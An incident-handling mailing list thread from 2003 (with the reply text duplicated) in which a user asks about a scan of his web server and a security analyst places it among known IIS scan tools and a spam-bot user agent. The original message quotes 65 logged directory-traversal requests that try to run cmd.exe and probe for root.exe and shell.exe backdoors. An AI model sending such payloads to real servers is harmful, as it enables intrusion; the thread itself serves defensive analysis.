Can you post (or provide a link) to the full tcpdump traces for this scan
pattern? It might aid in the analysis.
I haven't done a one-for-one comparison to verify the exact order and
specific requests issued, but I can say that we see some combination of
all of those GET requests on a continuous basis as we monitor our
customer's networks. Roughly that quantity and order of requests is very
common. In reality, the exact requests are not too important as IIS scan
tools are widely available [1] and are regularly modified (the original
posting of iis-kabom included 69 GET requests). We consistently see a
wide variety of patterns, from those that focus on a single GET request
against each host, to those that try virtually every conceivable method to
exploit the same old vulnerabilities (directory traversal, Unicode, double
decode, etc.).
Most of the IIS scans lately have been preceded by a broad ping sweep to
enumerate what machines are up in a given IP range. The scan then targets
only those hosts that have responded to the ping sweep. I also don't
recall seeing a request for shell.exe lately (or perhaps ever).
When you say TCP connect, I assume you mean that you saw a simple
connection to see if the port is listening (as accomplished with '$ nmap
-sT ...'). Or did you also see a HEAD or GET request to determine if this
was an IIS server?
Regarding the User Agent. People have been seeing that string since at
least 2001, and one person saw a single GET request similar to one you
included. [2] It appeared to be a spider that was crawling people's site
w/o respecting robots.txt. A single HEAD request was followed by a large
number of GETS. Some postulated it was coming from China and the logs
I've seen support that. [3]
It appears that seeing this User Agent string indicates the activity of a
well-known spam bot. Apparently, the Indy Library "is hi-jacked and abused by some Chinese spam bots. All recent user-agents
with the unmodified "Indy Library" string were of Chinese origin." [4]
So perhaps this is a (new?) IIS scan tool written in C/C++ to increase its
speed, include multi-threading, etc. Or maybe the spammers aren't
securing their boxes and are thus being compromised and used as launching
points for further attacks. Someone saw (from a cable ISP) the identical
pattern in terms of order and actual GET requests that you did with the
same UA string on 4/21/03, even including the request for shell.exe.[5]
They didn't mention a TCP Connect, but that's probably b/c they're only
looking at webserver logs. The fact that it's missing probably answers my
above question about an initial HEAD or GET request to determine the
server version, assuming this is really the same thing.
There are also more links discussing this UA string. [6] [7]
Jason Falciola
Information Security Analyst
IBM Managed Security Services
falciola (at) us.ibm (dot) com [email concealed]
Mark Embrich <mark_embrich (at) yahoo (dot) com [email concealed]>
04/24/2003 07:43 PM
To: incidents (at) securityfocus (dot) com [email concealed]
cc:
Subject: New attack or old Vulnerability Scanner?
Hello,
Does anyone recognize this pattern of a TCP connect scan, then 65 GETs?
Note that it also included: "User-Agent:.Mozilla/3.0.
(compatible;.Indy.Library)...."
For which my googling tells me that this attack/scanner is probably
built using Borland Delphi/C++ Builder suite.
I've so far received 3 of these from 2 different IP addresses.
The first two were from a Comcast cable user.
The last was from a Cox Communications IP.
------------------------------------------------------------------------
----
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the
world's premier event for IT and network security experts. The two-day
Training features 6 hand-on courses on May 12-13 taught by professionals.
The two-day Briefings on May 14-15 features 24 top speakers with no vendor
sales pitches. Deadline for the best rates is April 25. Register today to
ensure your place. http://www.securityfocus.com/BlackHat-incidents
------------------------------------------------------------------------
----
Can you post (or provide a link) to the full tcpdump traces for this scan
pattern? It might aid in the analysis.
I haven't done a one-for-one comparison to verify the exact order and
specific requests issued, but I can say that we see some combination of
all of those GET requests on a continuous basis as we monitor our
customer's networks. Roughly that quantity and order of requests is very
common. In reality, the exact requests are not too important as IIS scan
tools are widely available [1] and are regularly modified (the original
posting of iis-kabom included 69 GET requests). We consistently see a
wide variety of patterns, from those that focus on a single GET request
against each host, to those that try virtually every conceivable method to
exploit the same old vulnerabilities (directory traversal, Unicode, double
decode, etc.).
Most of the IIS scans lately have been preceded by a broad ping sweep to
enumerate what machines are up in a given IP range. The scan then targets
only those hosts that have responded to the ping sweep. I also don't
recall seeing a request for shell.exe lately (or perhaps ever).
When you say TCP connect, I assume you mean that you saw a simple
connection to see if the port is listening (as accomplished with '$ nmap
-sT ...'). Or did you also see a HEAD or GET request to determine if this
was an IIS server?
Regarding the User Agent. People have been seeing that string since at
least 2001, and one person saw a single GET request similar to one you
included. [2] It appeared to be a spider that was crawling people's site
w/o respecting robots.txt. A single HEAD request was followed by a large
number of GETS. Some postulated it was coming from China and the logs
I've seen support that. [3]
It appears that seeing this User Agent string indicates the activity of a
well-known spam bot. Apparently, the Indy Library "is hi-jacked and abused by some Chinese spam bots. All recent user-agents
with the unmodified "Indy Library" string were of Chinese origin." [4]
So perhaps this is a (new?) IIS scan tool written in C/C++ to increase its
speed, include multi-threading, etc. Or maybe the spammers aren't
securing their boxes and are thus being compromised and used as launching
points for further attacks. Someone saw (from a cable ISP) the identical
pattern in terms of order and actual GET requests that you did with the
same UA string on 4/21/03, even including the request for shell.exe.[5]
They didn't mention a TCP Connect, but that's probably b/c they're only
looking at webserver logs. The fact that it's missing probably answers my
above question about an initial HEAD or GET request to determine the
server version, assuming this is really the same thing.
There are also more links discussing this UA string. [6] [7]
[1] http://cert.uni-stuttgart.de/archive/bugtraq/2001/07/msg00537.html
[2] http://www.webmasterworld.com/forum11/803.htm
[3] http://www.webmasterworld.com/forum11/535.htm
[4] http://www.kloth.net/internet/bottrap
[5] http://www.webmasterworld.com/forum11/1864.htm
[6] http://www.webmasterworld.com/forum11/1218.htm
[7] http://www.webmasterworld.com/forum13/687.htm
Jason Falciola
Information Security Analyst
IBM Managed Security Services
falciola (at) us.ibm (dot) com [email concealed]
Mark Embrich <mark_embrich (at) yahoo (dot) com [email concealed]>
04/24/2003 07:43 PM
To: incidents (at) securityfocus (dot) com [email concealed]
cc:
Subject: New attack or old Vulnerability Scanner?
Hello,
Does anyone recognize this pattern of a TCP connect scan, then 65 GETs?
Note that it also included: "User-Agent:.Mozilla/3.0.
(compatible;.Indy.Library)...."
For which my googling tells me that this attack/scanner is probably
built using Borland Delphi/C++ Builder suite.
I've so far received 3 of these from 2 different IP addresses.
The first two were from a Comcast cable user.
The last was from a Cox Communications IP.
Thanks,
Mark Embrich
0. Scan TCP 80
1. GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
2. GET./..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
3. GET./_vti_bin/.%252e/.%252e/.%252e/.%
252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
4. GET./_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
5. GET./_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%
35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
6. GET./_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
7. GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
8. GET./_vti_bin/..%255c..%255c..%255c..%255c..%
255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
9. GET./_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
10. GET./_vti_bin/..%c0%af../..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
11. GET./_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
12. GET./_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
13. GET./adsamples/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
14. GET./adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
15. GET./cgi-bin/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
16. GET./cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
17. GET./iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%
252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
18. GET./iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
19. GET./iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
20. GET./iisadmpwd/..%c0%af../..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
21. GET./msadc/.%252e/.%252e/.%252e/.%
252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
22. GET./MSADC/..%%35%63..%%35%63..%%35%63..%%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
23. GET./msadc/..%%35%63../..%%35%63../..%%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
24. GET./MSADC/..%%35c..%%35c..%%35c..%%
35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
25. GET./msadc/..%%35c../..%%35c../..%%
35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
26. GET./msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
27. GET./msadc/..%25%35%63../..%25%35%63../..%25%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
28. GET./msadc/..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
29. GET./msadc/..%255c../..%255c../..%
255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
30. GET./msadc/..%c0%af../..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
31. GET./msadc/..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
32. GET./msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%
af../winnt/system32/cmd.exe/?/c/+dir+c:.HTTP/1.1..
33. GET./msdac/root.exe?/c+dir+c:.HTTP/1.1..
34. GET./msdac/shell.exe?/c+dir+c:.HTTP/1.1..
35. GET./PBServer/..%%35%63..%%35%63..%%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
36. GET./PBServer/..%%35c..%%35c..%%
35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
37. GET./PBServer/..%25%35%63..%25%35%63..%25%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
38. GET./PBServer/..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
39. GET./Rpc/..%%35%63..%%35%63..%%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
40. GET./Rpc/..%%35c..%%35c..%%
35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
41. GET./Rpc/..%25%35%63..%25%35%63..%25%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
42. GET./Rpc/..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
43. GET./samples/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
44. GET./samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
45. GET./scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
46. GET./scripts/.%252e/.%
252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
47. GET./scripts/..%252f..%252f..%252f..%
252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
48. GET./scripts/..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
49. GET./scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
50. GET./scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%
AFwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
51. GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
52. GET./scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
53. GET./scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%
1Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
54. GET./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
55. GET./scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
56. GET./scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%
9Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
57. GET./scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
58. GET./scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
59. GET./scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
60. GET./scripts/..%e0%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
61. GET./scripts/..%f0%80%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
62. GET./scripts/..%f8%80%80%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
63. GET./scripts/..%fc%80%80%80%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
64. GET./scripts/root.exe?/c+dir+c:.HTTP/1.1..
65. GET./scripts/shell.exe?/c+dir+c:.HTTP/1.1..
------------------------------------------------------------------------
----
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the
world's premier event for IT and network security experts. The two-day
Training features 6 hand-on courses on May 12-13 taught by professionals.
The two-day Briefings on May 14-15 features 24 top speakers with no vendor
sales pitches. Deadline for the best rates is April 25. Register today to
ensure your place. http://www.securityfocus.com/BlackHat-incidents
------------------------------------------------------------------------
----
[ reply ]